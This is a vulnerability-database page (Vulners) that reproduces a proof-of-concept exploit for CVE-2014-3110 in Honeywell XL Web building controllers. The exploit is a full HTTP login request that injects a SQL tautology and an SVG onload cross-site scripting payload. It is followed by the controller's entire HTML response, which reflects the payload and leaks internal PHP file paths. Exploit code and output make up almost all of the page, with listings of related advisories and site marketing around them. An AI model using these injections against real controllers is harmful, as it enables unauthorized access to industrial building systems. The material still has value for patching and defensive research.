Vulners
Lucene search
Honeywell XL Web Controller Cross Site Scripting / SQL Injection
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
 | Honeywell XL Web Controller - Cross-Site Scripting Vulnerability | 24 May 201800:00 | – | zdt |
 | CVE-2014-3110 | 24 Jul 201414:00 | – | cve |
 | CVE-2014-3110 | 24 Jul 201414:00 | – | cvelist |
 | Honeywell XL Web Controller - Cross-Site Scripting | 24 May 201800:00 | – | exploitdb |
 | EUVD-2014-3131 | 7 Oct 202500:30 | – | euvd |
 | Honeywell XL Web Controller - Cross-Site Scripting | 24 May 201800:00 | – | exploitpack |
 | Honeywell FALCON XLWeb Controllers Vulnerabilities | 27 Mar 201406:00 | – | ics |
 | CVE-2014-3110 | 24 Jul 201414:55 | – | nvd |
 | Cross site scripting | 24 Jul 201414:55 | – | prion |
`# Exploit Title: Honeywell XL Web Controller SQLi & XSS
# Date: 2018-05-24
# Exploit Author: t4rkd3vilz
# Vendor Homepage: https://www.honeywell.com
# Version: WebVersion : XL1000C50 EXCEL WEB 52 I/O, XL1000C100 EXCEL WEB
104 I/O, XL1000C500 EXCEL WEB 300 I/O, XL1000C1000 EXCEL WEB 600 I/O,
XL1000C50U EXCEL WEB 52 I/O UUKL, XL1000C100U EXCEL WEB 104 I/O UUKL,
XL1000C500U EXCEL WEB 300 I/O UUKL, and XL1000C1000U EXCEL WEB 600 I/O UUKL.
# Tested on: Linux
# CVE: CVE-2014-3110
--------------- ---> Proof Of Concept <--------------------------
POST /standard/mainframe.php HTTP/1.1
Cache-Control: no-cache
Referer: http://TargetIP/standard/mainframe.php
Accept: text/xml,application/xml,application/xhtml+xml,text/
html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/41.0.2272.16 Safari/537.36
Accept-Language: en-us,en;q=0.5
Cookie: Locale=1033
Accept-Encoding: gzip, deflate
Content-Length: 222
Content-Type: application/x-www-form-urlencoded
SessionID=&LocaleID='or'1=1&LoginSessionID=&LoginUserNameMD5="/><svg/
onload=prompt(/XSS/)>
&LoginPasswordMD5=&LoginCommand=&LoginPassword=&
rememberMeCheck=&LoginDevice=192.168.1.12&LoginUserName=Guest
HTTP/1.1 200 OK
Set-Cookie: rememberUser=deleted; expires=Wednesday, 24-May-17 08:54:02
GMT; path=/
Server: Apache/1.3.23 (Unix) PHP/4.4.9
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Transfer-Encoding: chunked
Date: Thu, 24 May 2018 08:54:03 GMT
<br />
<b>Warning</b>: xw_get_users() expects parameter 1 to be long, string
given in <b>/mnt/mtd6/xlweb/web/standard/login/loginpage.php</b> on line
<b>97</b><br />
<br />
<b>Warning</b>: xml_load_texts_file() expects parameter 2 to be long,
string given in <b>/mnt/mtd6/xlweb/web/standard/include/elements.php</b> on
line <b>247</b><br />
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8"/>
<meta http-equiv="expires" content="0"/>
<link rel="stylesheet" href="include/honeywell.css"/>
<title><br />
<b>Notice</b>: Undefined index: HeadTitle in <b>/mnt/mtd6/xlweb/web/
standard/login/loginpage.php</b> on line <b>300</b><br />
</title>
<script language="JavaScript">
<!--
var NS4 = document.layers;
// if the selected element has alarms, the element within the
// drop Down-list should be styled red.
// This is done for firefox which does not accept even the
// usage of inline styles.
function setOptionColor() {
if(document.getElementById("LoginSelect") != null) {
var selectionBox = document.getElementById("LoginSelect");
var selectedElement = selectionBox.selectedIndex;
var selectedOption = selectionBox.options[selectedElement];
if(selectedOption.getAttribute("class") != null) {
var className = selectedOption.getAttribute("class");
if(className == "red") {
selectionBox.style.color = "#FF0000";
}
}
}
}
function onSessionChange (sSessionID, sLocaleID)
{
document.forms.main.elements["SessionID"].value = sSessionID;
document.forms.main.elements["LocaleID"].value = sLocaleID;
submitCommand ("ChangeSession");
}
function onDeviceListChange ()
{
submitCommand ("UpdateDeviceList");
}
function onSessionCreated (sResult, sSessionID)
{
if (sResult != "4194561")
{
if (sResult == "196626")
{
alert ("<br />
*<b>Notice</b>: Undefined index: CreateSessionFailed in
<b>/mnt/mtd6/xlweb/web/standard/login/loginpage.php</b> on line
<b>346</b><br />*
*\n" +*
"\n" +
"<br />
*<b>Notice</b>: Undefined index: TooManyUsers in
<b>/mnt/mtd6/xlweb/web/standard/login/loginpage.php</b> on line
<b>348</b><br />*
*");*
}
else
{
alert ("<br />
*<b>Notice</b>: Undefined index: CreateSessionFailed in
<b>/mnt/mtd6/xlweb/web/standard/login/loginpage.php</b> on line
<b>352</b><br />*
*\n" +*
"\n" +
"<br />
*<b>Notice</b>: Undefined index: OperationalProblem in
<b>/mnt/mtd6/xlweb/web/standard/login/loginpage.php</b> on line
<b>354</b><br />*
*");*
}
return;
}
var sUserName = document.forms.main.elements["LoginUserName"].value;
var sPassword = calcMD5 (document.forms.main.elements[
"LoginPassword"].value);
sPassword = calcMD5 (sSessionID + sUserName + sPassword);
sUserName = calcMD5 (sUserName);
document.forms.main.elements["LoginSessionID"].value = sSessionID;
document.forms.main.elements["LoginUserNameMD5"].value = sUserName;
document.forms.main.elements["LoginPasswordMD5"].value = sPassword;
submitCommand ("Login");
}
function showHelp (sHelpID)
{
var lWidth = 360;
var lHeight = 320;
var lLeft = (screen.width - lWidth) / 2;
var lTop = (screen.height - lHeight) / 2;
openDependent (*"login/help.php?Locale="/><svg/onload=prompt(/XSS/)>*
&ID=" + sHelpID,
"Help",
"width=" + lWidth + ",height=" + lHeight + ",left=" +
lLeft + ",top=" + lTop + ",scrollbars=yes,resizable=yes");
}
function submitCommand (sCommand)
{
//document.forms.main.elements["LoginPassword"].value = "";
document.forms.main.elements["LoginCommand"].value = sCommand;
document.forms.main.submit ();
}
function checkEnter (event)
{
var lkeyCode = 0;
if (NS4)
{
lkeyCode = event.which;
}
else
{
lkeyCode = event.keyCode;
}
if (lkeyCode == 13)
{
createSession ();
}
}
function changeDevice ()
{
var oOptions = document.forms.main.elements["
LoginDevice"].options;
for (var lIndex = 0; lIndex < oOptions.length; lIndex++)
{
if (oOptions[lIndex].selected)
{
var sURL = "http://" + oOptions[lIndex].value;
sURL += ":80";
sURL += "/standard/";
sURL += "default.php?Locale="/><svg/onload=prompt(/XSS/)>
";
parent.parent.window.location.replace (sURL);
return;
}
}
}
function createSession ()
{
if (top.frames.updateframe &&
top.frames.updateframe.createSession)
{
top.frames.updateframe.createSession ();
}
else
{
var lLeft = screen.width;
var lTop = screen.height;
var oWindow = open ("login/session.php",
"Session",
"width=0,height=0,left=" + lLeft + ",top=" +
lTop + ",dependent=yes,locationbar=no,menubar=no,status=no,scrollbars=no");
}
}
function onLoad ()
{
if (top.frames.updateframe)
{
top.frames.updateframe.location.replace ("login/update.php");
}
document.main.LoginUserName.focus ();
}
//-->
</script>
<script type="text/javascript" src="scripts/md5.js"></script>
</head>
<body onload="setOptionColor()" class="colored" onLoad="onLoad ();"
style="background-image: url(images/bg_headline_dialog.gif);
background-repeat:repeat-x;">
<form name="main" method="post" action="/standard/mainframe.php">
<input type="hidden" name="SessionID"/>
<input type="hidden" name="LocaleID" value="'"--></
style></scRipt><scRipt>netsparker(0x0001AA)</scRipt>"/>
<input type="hidden" name="rememberMeCheck" value=""/>
<input type="hidden" name="LoginSessionID"/>
<input type="hidden" name="LoginUserNameMD5"/>
<input type="hidden" name="LoginPasswordMD5"/>
<input type="hidden" name="LoginCommand"/>
<!-- *******************************************************************
-->
<!-- * Controller Name
* -->
<!-- *******************************************************************
-->
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr><td bgcolor="#7F7F7F"><img alt=""
src="images/blank.gif" width="1" height="1"/></td></tr>
<tr><td bgcolor="#000000"><img alt="" src="images/blank.gif"
width="1" height="1"/></td></tr>
<tr>
<td class="headline" height="16" nowrap="">
AUM0_MUSEO_LANA.XLWEB_MUSEO_LANA.<br />
<b>Notice</b>: Undefined index: Title in <b>/mnt/mtd6/xlweb/web/
standard/login/loginpage.php</b> on line <b>509</b><br />
</td>
</tr>
</table>
<table width="100%" height="75%" border="0" cellpadding="0"
cellspacing="0">
<tr>
<td width="50%"> </td>
<td>
<table border="0" cellspacing="7" cellpadding="0">
<!-- ******************************
************************************* -->
<!-- * Custom image
* -->
<!-- ******************************
************************************* -->
<tr>
<td>
<table width="100%" border="0" cellpadding="0"
cellspacing="0">
<tr>
<td align="center">
<img alt="" src="login/loginlogo.gif"
/>
</td>
</tr>
<tr><td><img alt="" src="images/blank.gif" width="1"
height="7"/></td></tr>
</table>
</td>
</tr>
<!-- ******************************
************************************* -->
<!-- * Login group
* -->
<!-- ******************************
************************************* -->
<tr>
<td>
<br />
<b>Notice</b>: Undefined index: Login in <b>/mnt/mtd6/xlweb/web/
standard/login/loginpage.php</b> on line <b>596</b><br />
<br />
<b>Notice</b>: Undefined index: AltTitle in <b>/mnt/mtd6/xlweb/web/
standard/login/loginpage.php</b> on line <b>597</b><br />
<table width="100%" border="0" cellspacing="0" cellpadding="0"
bgcolor="#B8D7F0">
<tr>
<td><img alt="" src="images/group_left_top.gif" width="5"
height="5"/></td>
<td><img alt="" src="images/blank.gif" width="1" height="5"/></td>
<td align="right"><img alt="" src="images/group_right_top.gif"
width="5" height="5"/></td>
</tr>
<tr>
<td><img alt="" src="images/blank.gif" width="5" height="1"/></td>
<td width="100%" valign="top">
<table width="100%" border="0" cellspacing="0" cellpadding="2">
<tr>
<td colspan="2" class="groupheader" nowrap="">
<b></b>
</td>
<td align="right">
</td>
</tr>
<tr>
<td> </td>
<td width="100%">
<table border="0" cellpadding="1" cellspacing="1">
<tr>
<td nowrap=""><br />
<b>Notice</b>: Undefined index: Controller in <b>/mnt/mtd6/xlweb/web/
standard/login/loginpage.php</b> on line <b>605</b><br />
: </td>
<td>
<select id="LoginSelect" class="loginSelect"
name="LoginDevice" onchange="changeDevice ();" style="width:150px;">
<option
selected="" value="192.168.1.12"
class="red" style="color:#FF0000;
background-color:#D8E8F8">
XLWEB_MUSEO_LANA
</option>
</select>
</td>
<td> </td>
<td align="right">
<img alt="" name="LoginAlarm"
src="footer/alarm_red_tr.gif"> </td>
</tr>
<tr>
<td nowrap=""><br />
<b>Notice</b>: Undefined index: UserName in <b>/mnt/mtd6/xlweb/web/
standard/login/loginpage.php</b> on line <b>632</b><br />
: </td>
<td>
<select name="LoginUserName" style="width:150px;">
<br />
<b>Warning</b>: Invalid argument supplied for foreach() in
<b>/mnt/mtd6/xlweb/web/standard/login/loginpage.php</b> on line
<b>650</b><br />
</select>
</td>
</tr>
<tr>
<td nowrap=""><br />
<b>Notice</b>: Undefined index: Password in <b>/mnt/mtd6/xlweb/web/
standard/login/loginpage.php</b> on line <b>689</b><br />
: </td>
<td>
<!--<input type="password" class="text" name="LoginPassword"
style="width:150px;" onKeyPress="checkEnter (event)"/>-->
<input name="LoginPassword" type="password" onKeyDown="checkEnter (event)"
size="25" class="ppinput" value=""/>
</td>
</tr>
<tr>
<td><br />
<b>Notice</b>: Undefined index: RememberMeCheckbox in
<b>/mnt/mtd6/xlweb/web/standard/login/loginpage.php</b> on line
<b>720</b><br />
</td>
<td><input id="rememberMeCheck" name="rememberMeCheck" type="checkbox"
/></td>
</tr>
<tr>
<td><img alt="" src="images/blank.gif" width="90"
height="2"/></td>
<td><img alt="" src="images/blank.gif" width="1"
height="2"/></td>
</tr>
</table>
</td>
<td> </td>
</tr>
</table>
</td>
<td><img alt="" src="images/blank.gif" width="5" height="1"/></td>
</tr>
<tr>
<td><img alt="" src="images/group_left_bottom.gif" width="5"
height="5"/></td>
<td><img alt="" src="images/blank.gif" width="1" height="5"/></td>
<td align="right"><img alt="" src="images/group_right_bottom.gif"
width="5" height="5"/></td>
</tr>
</table>
</td>
</tr>
<!-- ******************************
************************************* -->
<!-- * Button
* -->
<!-- ******************************
************************************* -->
<tr>
<td>
<table border="0" cellspacing="7" cellpadding="0">
<tr>
<td>
<br />
<b>Notice</b>: Undefined index: LoginButton in <b>/mnt/mtd6/xlweb/web/
standard/login/loginpage.php</b> on line <b>750</b><br />
<br />
<b>Notice</b>: Undefined index: AltTitle in <b>/mnt/mtd6/xlweb/web/
standard/login/loginpage.php</b> on line <b>751</b><br />
<table border="0" cellspacing="0" cellpadding="0" >
<tr>
<td><img alt="" src="images/buttonleft.gif" width="7"
height="18"/></td>
<td background="images/buttonmiddle.gif" nowrap=""><a
class="button" href="JavaScript:createSession ();" title=""></a></td>
<td><img alt="" src="images/buttonright.gif" width="7"
height="18"/></td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
<td width="50%"> </td>
</tr>
</table>
</form>
</body>
</html>
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
24 May 2018 00:00Current
0.1Low risk
Vulners AI Score0.1
EPSS0.02428